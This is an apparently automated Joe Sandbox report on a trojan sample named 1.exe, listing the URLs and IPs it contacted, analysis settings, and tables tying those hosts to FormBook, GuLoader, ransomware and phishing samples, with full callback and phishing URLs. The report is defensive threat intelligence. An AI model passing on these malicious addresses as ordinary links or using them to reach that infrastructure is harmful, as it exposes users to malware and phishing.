http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	1.exe, 00000000.00000002.2021348011.0000000002E71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.wisdomtoothguru.comReferer:	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kvrkl.com/jskg/	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wns.windows.com/)s	explorer.exe, 00000003.00000002.4453052192.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.kvrkl.com	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.topazkibblez.com	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.coryfireshop.comReferer:	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dog2meeting.com/jskg/www.erotictoybox.com	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.revistabrasileiramarketing.info/jskg/www.lactationdrink.com	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wisdomtoothguru.com/jskg/	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.litespeedtech.com/error-page	explorer.exe, 00000003.00000002.4456836117.0000000011332000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4450315499.00000000054F2000.00000004.10000000.00040000.00000000.sdmp	false		high
http://www.lbarco.comReferer:	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lbarco.com	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.revistabrasileiramarketing.infoReferer:	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.topazkibblez.comReferer:	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bootyfashions.com	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.topazkibblez.com/jskg/www.coryfireshop.com	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pnorg.net	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pnorg.net/jskg/www.dog2meeting.com	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lactationdrink.com/jskg/www.wisdomtoothguru.com	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.switchtoambitwithmirtha.com/jskg/www.ppc-listing.info	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.com	explorer.exe, 00000003.00000000.2005157411.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4453687156.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094165083.0000000009D42000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.erotictoybox.com/jskg/	explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.cloudflare.com/5xx-error-landing	explorer.exe, 00000003.00000002.4456836117.0000000011332000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4450315499.00000000054F2000.00000004.10000000.00040000.00000000.sdmp	false		high
http://www.topazkibblez.com/jskg/	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.erotictoybox.com	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dog2meeting.comReferer:	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.switchtoambitwithmirtha.comReferer:	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000003.00000003.3095015364.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3780015458.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2003510228.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4451321955.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.kvrkl.comReferer:	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dog2meeting.com/jskg/	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/	explorer.exe, 00000003.00000002.4453052192.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.bootyfashions.com/jskg/	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lacroixundkress.com/jskg/	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lactationdrink.com/jskg/	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.switchtoambitwithmirtha.com	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.v	explorer.exe, 00000003.00000000.2001871398.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4448974063.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.bootyfashions.com/jskg/www.topazkibblez.com	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lbarco.com/jskg/	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.lacroixundkress.com	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.revistabrasileiramarketing.info	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wisdomtoothguru.com	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
217.160.0.167	www.lacroixundkress.com	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
23.227.38.74	shops.myshopify.com	Canada	13335	CLOUDFLARENETUS	true
34.149.87.45	td-ccm-neg-87-45.wixdns.net	United States	2686	ATGS-MMD-ASUS	true
167.172.69.40	lactationdrink.com	United States	14061	DIGITALOCEAN-ASNUS	true

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1345564
Start date and time:	2023-11-21 03:29:18 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	1.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@303/1@37/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 97 Number of non-executed functions: 280
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:30:04	API Interceptor	1x Sleep call for process: 1.exe modified
03:30:24	API Interceptor	1562x Sleep call for process: explorer.exe modified
03:30:47	API Interceptor	11857574x Sleep call for process: colorcpl.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
217.160.0.167	SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe	Get hash	malicious	FormBook	Browse	www.skyepattest.com/obc0/?-Zbh98=7PSH/Ln00kiEZ+8VHNPsGnjemOaV3QQvmjWzLH8ChjGT6OrVSUax7xbhQJ4P9gQznTCEUU1HjkXGkkJ8y3lbGhe/UOddQQeZUw==&C0=X82hHfExC6QP
23.227.38.74	G7DyaA9iz9.exe	Get hash	malicious	Pushdo	Browse	www.snugpak.com/
	D19302431033.exe	Get hash	malicious	FormBook	Browse	www.bunnynbean.com/2bht/?1P=m0EaaZIqJVlZE2HP9ljvlNLRAKlxXmAgIxKOVFAFs6eoJHlYtxzbbw9fQNEPHJKi9iTGyVbi1tIVuY4yrg1POQTIxPW75bLtAQ==&tv=vv0Tbty0
	U6SJBLxT2Z.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.littlehappiez.com/fbkg/?T6I=gThqwOvIwGDnMNcvwEy/c56UiQuqoTrywE2cwCjfVSyuasLCA8NVIajs9Zxk63n6o6uPmxzzITamFvPAcrLEMG/rHqTHzN/vWA==&Nx1L1=526dgl_phJ
	DHL_INFO.exe	Get hash	malicious	FormBook	Browse	www.littlehappiez.com/qbnf/?UTMtlFWp=xQ3Ph8L6gfhabMpRdMbnMj3S/aWcOMQY2wxuFvurYqwmiHHCsC9TBeQzFkPaxQmv47dmZ283atZixtC0U8ygbBhksE1tsC5KGA==&nPWl=rhyL2fOpjfcpM8f0
	Shipping_documentsInvoice_and_Packing_List,_Certificate_of_Origin.exe	Get hash	malicious	FormBook	Browse	www.littlehappiez.com/udwf/?Hxp8=d3XFPJoaQLbhU6h3v+zeWzc/mRG2KVOyEGZO6Ue9tsKz9KlFIum590y6ceFEWr4SYEQ/fNsJ5znTfk9k4b6Tztvt46MHDG3NVA==&-l=Zt9dC2zX5RfhF0
	DHL_INFO.exe	Get hash	malicious	FormBook	Browse	www.littlehappiez.com/qbnf/?vzQ=xQ3Ph8L6gfhabMpRdMbnMj3S/aWcOMQY2wxuFvurYqwmiHHCsC9TBeQzFkPaxQmv47dmZ283atZixtC0U8yhNxV9ml0BpgEwEg==&afHha=9nyDkv9pehJT7
	9008654324456.exe	Get hash	malicious	FormBook	Browse	www.merchdojacat.com/ao65/?DlS=H/j4IzLOr/ma+MrtcXPZJgpFgsNl0nnrzRzRByyHvrNOcKs1pJnpG73nLxOakv5S42Ff&P2J=0nMX8h7
	SOA_PAYMENT_OCTOBER_2023.exe	Get hash	malicious	FormBook	Browse	www.littlehappiez.com/udwf/?v6z=d3XFPJoaQLbhU6h03+z0XCc0ox6MaGmyEGZO6Ue9tsKz9KlFIum590y6ceFEWr4SYEQ/fNsJ5znTfk9k4b6SgLLHqZk1UVLkXQ==&nJR=bFdpxrNHS
	NEW_ORDERS_scan_29012019.exe	Get hash	malicious	FormBook	Browse	www.littlehappiez.com/udwf/?cVe=d3XFPJoaQLbhU6h3v+zeWzc/mRG2KVOyEGZO6Ue9tsKz9KlFIum590y6ceFEWr4SYEQ/fNsJ5znTfk9k4b6Tztvt46MHDG3NVA==&A2yx=3z8TMz30rRNxo
	aL1RGq86iP.exe	Get hash	malicious	FormBook	Browse	www.menofthehouse.store/o5gu/?tzr8kDK=qg/YE8sv2kHz4HoB5P532/da1RukGVzt5ajyxB8ZSTzWcs4hj3ytsqdM8A97teqcgX5H&kPj=Knk0k
	PURCHASE_ORDERPOmt1904069_1.exe	Get hash	malicious	FormBook	Browse	www.littlehappiez.com/udwf/?CRXDz4o=d3XFPJoaQLbhU6h03+z0XCc0ox6MaGmyEGZO6Ue9tsKz9KlFIum590y6ceFEWr4SYEQ/fNsJ5znTfk9k4b6SgMzLlK80QmTNVA==&Xzy=Ip3twPCPU
	October'23_Statement_of_Account.exe	Get hash	malicious	FormBook	Browse	www.littlehappiez.com/udwf/?wBDPln=d3XFPJoaQLbhU6h3v+zeWzc/mRG2KVOyEGZO6Ue9tsKz9KlFIum590y6ceFEWr4SYEQ/fNsJ5znTfk9k4b6Tztvt46MHDG3NVA==&EJbD=nReDZBOh_DBP
	svcVJ3Ljwp.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.modeparisiennefr.com/ge06/?Lv6d=1PQ6+z1ze+lmDNFVdWRWHzULIaSgIyGLxv5afdk1Mu1zUKzaDU1Gs909WHX1z4ScBj5S&VPK0i=xN9LEhVxD
	Invoice_&_SOA_ready_for_dispatch.exe	Get hash	malicious	FormBook	Browse	www.littlehappiez.com/udwf/?G0Yxd2Q=d3XFPJoaQLbhU6h03+z0XCc0ox6MaGmyEGZO6Ue9tsKz9KlFIum590y6ceFEWr4SYEQ/fNsJ5znTfk9k4b6SgMzLlK80QmTNVA==&vhQT=aV8PeNo0MvDl1
	VoeNehitmj.exe	Get hash	malicious	FormBook	Browse	www.familyfarmequipment.com/o6g2/?TjX=nS9YWzEs3t/cvw8vsYNBshoWv9LGSbS8x4bIAiF2evmS+jLDSfz0OyK3ynHx6dYnwjGq&P2MP1h=zbXdDXaXifa
	OhKvz8IfyV.exe	Get hash	malicious	FormBook	Browse	www.souqshopper.com/bp31/
	61cQ2AJ5tR.exe	Get hash	malicious	FormBook	Browse	www.menofthehouse.store/o5gu/?6l=odqhy&Uxo8kRj=qg/YE8sv2kHz4HoB5P532/da1RukGVzt5ajyxB8ZSTzWcs4hj3ytsqdM8DJrofKn4nYA
	n9YlRHN0RF.exe	Get hash	malicious	FormBook	Browse	www.easyhub.xyz/o5gu/?-ZU=kXj2Vlk/Wr2gri8EsNAx6yfTcKpBoQiQxVcQeRsb/63MrFG79gcFZoid0bM8oY0hEQJAQO71ZQ==&ML3=FdIpDVy0kFCtTfeP
	Transaction#15.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.alcaponestreetwear.store/st58/?Xjm0O=QLfwsGD2dvo9T0yrtq8KbR4n2qBXvdf70IGWMvV7l/pMHpV2VQsYBuUn04TPJAdDSZzG&6l=tFNLuPs0qx3D
	j7jbTHWTgi.exe	Get hash	malicious	FormBook	Browse	www.menofthehouse.store/o5gu/?-Zy=qg/YE8tb2ECDl311l/532/da1RukGVzt5ajyxB8ZSTzWcs4hj3ytsqdM8ApR4OqfiA5H&jFQ88F=4hX0GTFH3RR0

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.lacroixundkress.com	h3dFAROdF3.exe	Get hash	malicious	FormBook	Browse	92.204.33.8
www.lacroixundkress.com	P0_4859930058_NEW_0RDER.xlsx	Get hash	malicious	FormBook	Browse	92.204.33.8
td-ccm-neg-87-45.wixdns.net	S00989282313413.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	Maersk_K22TSI714881.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	S00989282313413.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	S00989282313413.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	S00989282313413.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	S00989282313413.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	ekstre.exe	Get hash	malicious	FormBook, GuLoader	Browse	34.149.87.45
	SecuriteInfo.com.Win32.PWSX-gen.27152.6475.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	Booking_amendment.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	RFQ-T56797W_1.xlsx	Get hash	malicious	FormBook, NSISDropper	Browse	34.149.87.45
	1451__TrogeShippingSchedule.doc	Get hash	malicious	FormBook	Browse	34.149.87.45
	wM34vVyJ6k.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	9i6tQlNW5V.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	Quotation.xls	Get hash	malicious	FormBook	Browse	34.149.87.45
	Sshoueh5iH.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	Payment_Swifts.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	S00989282313413.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	PTDwRpT7xd.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	hiRBjcOzDH.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	VoeNehitmj.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
shops.myshopify.com	D19302431033.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	Fax-399383-3003-30393.xlsx	Get hash	malicious	Unknown	Browse	23.227.38.74
	U6SJBLxT2Z.exe	Get hash	malicious	FormBook, GuLoader	Browse	23.227.38.74
	DHL_INFO.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	Shipping_documentsInvoice_and_Packing_List,_Certificate_of_Origin.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	DHL_INFO.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	9008654324456.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	SOA_PAYMENT_OCTOBER_2023.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	NEW_ORDERS_scan_29012019.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	aL1RGq86iP.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	PURCHASE_ORDERPOmt1904069_1.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	October'23_Statement_of_Account.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	svcVJ3Ljwp.exe	Get hash	malicious	FormBook, NSISDropper	Browse	23.227.38.74
	Invoice_&_SOA_ready_for_dispatch.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	VoeNehitmj.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	OhKvz8IfyV.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	61cQ2AJ5tR.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	n9YlRHN0RF.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	Transaction#15.exe	Get hash	malicious	FormBook, NSISDropper	Browse	23.227.38.74
	j7jbTHWTgi.exe	Get hash	malicious	FormBook	Browse	23.227.38.74

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ONEANDONE-ASBrauerstrasse48DE	G7DyaA9iz9.exe	Get hash	malicious	Pushdo	Browse	74.208.215.145
	009c487a.exe	Get hash	malicious	FormBook	Browse	217.160.0.131
	S00989282313413.exe	Get hash	malicious	FormBook	Browse	74.208.239.72
	Maersk_K22TSI714881.exe	Get hash	malicious	FormBook	Browse	217.160.0.118
	S00989282313413.exe	Get hash	malicious	FormBook	Browse	74.208.239.72
	S00989282313413.exe	Get hash	malicious	FormBook	Browse	74.208.239.72
	S00989282313413.exe	Get hash	malicious	FormBook	Browse	74.208.239.72
	S00989282313413.exe	Get hash	malicious	FormBook	Browse	74.208.239.72
	009c487a.exe	Get hash	malicious	FormBook	Browse	217.160.0.131
	Rgi3BxJNQJ.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, Xmrig, zgRAT	Browse	93.90.203.42
	Payment_Copy.exe	Get hash	malicious	FormBook	Browse	217.160.0.182
	009c487a.exe	Get hash	malicious	FormBook	Browse	217.160.0.131
	FifDiutv3Y.exe	Get hash	malicious	Sodinokibi	Browse	212.227.37.46
	a0QFYpDZZz.exe	Get hash	malicious	Sodinokibi	Browse	217.160.0.10
	PGeBff2Pio.exe	Get hash	malicious	Sodinokibi, TrojanRansom	Browse	82.165.2.92
	DECART.exe	Get hash	malicious	FormBook	Browse	217.160.0.118
	Waybill.exe	Get hash	malicious	FormBook	Browse	217.160.0.131
	Transferencia-30.000,00 EURpdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	217.160.0.68
	INV#761538.exe	Get hash	malicious	FormBook	Browse	217.160.0.27
	https://c.mail.com/@1280704687602934355/eRzaDYmuQPWbqYPwLMgklw	Get hash	malicious	Unknown	Browse	195.20.251.111
CLOUDFLARENETUS	https://pub-97f9f317ed874fc8833e90dfd2ecaad6.r2.dev/wscrp.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://switchology.me/	Get hash	malicious	Unknown	Browse	172.64.155.119
	https://pub-ce5e69151a0b40eeb091b01b366df97e.r2.dev/realmsn.html	Get hash	malicious	HTMLPhisher	Browse	104.18.3.35
	https://pub-a188a8112d98441ab69d0ba999f1285e.r2.dev/now.html	Get hash	malicious	HTMLPhisher	Browse	104.18.3.35
	https://pub-2181880fed354825aabfd62eb79d0daf.r2.dev/do.html	Get hash	malicious	HTMLPhisher	Browse	104.18.3.35
	https://drpatel.co.uk/wp-images/themes/Security_on_your_card_account.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://rjtlawfirm.sharefile.com/d-3e8cb5040ece40a0	Get hash	malicious	HTMLPhisher	Browse	162.247.243.29
	https://att-yahoo-107847.weeblysite.com/	Get hash	malicious	Unknown	Browse	104.18.131.236
	http://tinyurl.com/baro25/5MfaSg63261fSbr304kosmckwnwc8116DREPAQIYBAMMYIE1738/15291V22	Get hash	malicious	Phisher	Browse	172.67.145.185
	https://pub-661b53fed9cd4f549125768c52464fd0.r2.dev/cc2.html	Get hash	malicious	HTMLPhisher	Browse	104.18.3.35
	Bii5pNOH1t.dll	Get hash	malicious	Unknown	Browse	172.67.207.215
	https://www.baidu.com/link?url=KjDByt_ZmZqFIaMBqfop5n4ZI6N7vY5xNzJSHgaebpapH_ZSkf2a-FXqwn9aiV29#eXZldHRlQGthdHlzcHJpbmcuY29t	Get hash	malicious	HTMLPhisher	Browse	172.67.168.216
	https://violet-print.com/michigan-vs-eeverything-t-shirt	Get hash	malicious	Unknown	Browse	172.67.20.205
	http://47.96.150.225/gr.html	Get hash	malicious	Unknown	Browse	104.22.75.171
	Aging_05665outl.html	Get hash	malicious	HTMLPhisher	Browse	104.21.82.98
	https://rjtlawfirm.sharefile.com/d-62e12d1d2a2e4037	Get hash	malicious	HTMLPhisher	Browse	162.247.243.29
	https://mjemonline.com/	Get hash	malicious	HTMLPhisher	Browse	104.21.71.75
	https://rjtlawfirm.sharefile.com/d-9543a8d6e3f84daf	Get hash	malicious	HTMLPhisher	Browse	162.247.243.29
	http://www.howardenergypartners.com	Get hash	malicious	Unknown	Browse	104.18.10.207
	file.exe	Get hash	malicious	Glupteba, Vidar	Browse	172.67.169.89

Process:	C:\Users\user\Desktop\1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	5.3387892510515025
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4sAmE4Ks:MgvjHK5HKH1qHiYHKh3oPtHo6hAHKzeL
MD5:	8C61F9E2B19E0315722C135D70192939
SHA1:	BFC216104805B4183FD0A9153EE0B39076AECCBC
SHA-256:	AFA04F5408E6285A7B01334D40EA524ADB37116790061849F4D6B48D880D93A0
SHA-512:	55CC4879F5AC9C5BDB659D0DC915102B39BC2035CF1C3CADBF3BE6A4447B5613A9D665FC06AD3F461803D04495AAD5EAB0758C02B8F110090FF6F791B80B270D
Malicious:	false
Reputation:	moderate, very likely benign file
